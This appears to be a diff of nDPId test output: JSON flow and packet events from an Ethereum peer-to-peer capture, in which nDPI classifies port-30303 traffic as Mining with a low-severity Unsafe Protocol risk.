+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1578508365154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365154,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4TfAqAG4iskMV91Ldl\/HR3E5AAAAALAC\/\/+X6AAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365169,"flow_last_seen":1578508365169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365169,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcflcAAEARfx\/AqAG4Etunn3Zfdl8AiGnBB7Pc5ZlsDZTbUrqaaoRxeL1l7Crbcxf\/BOXFZNGdyZsOxpmBlW67u9+KWe59CkWnKw2GIsEnEKk87oxTf3me3BvKcrMQD0jXMXlBXiHkLViPnwRaOVxyx4odh7D\/BO97AAHdBMuEfwAAAYJ2X4J2X8mEEtunn4J2X4CEXhYgYQU="} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQhrAqAG4neaYV91Sdl9OT1qyAAAAALAC\/\/+H9wAAAgQFtAEDAwUBAQgKItiW2wAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365271,"flow_last_seen":1578508365271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365271,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1578508365271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365271,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLavAqAG4M6EXDN1Udl9XVw7PAAAAALAC\/\/+2RQAAAgQFtAEDAwUBAQgKItiW9wAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365279,"flow_last_seen":1578508365279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365279,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1578508365279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365279,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxArAqAG4NAmARN1Vdl\/t7etbAAAAALAC\/\/\/ZeQAAAgQFtAEDAwUBAQgKItiW\/gAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365295,"flow_last_seen":1578508365295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365295,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1578508365295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365295,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbF\/AqAG4I+XoE91Wdl\/o6wkCAAAAALAC\/\/9pGwAAAgQFtAEDAwUBAQgKItiXDAAAAAAEAgAA"} 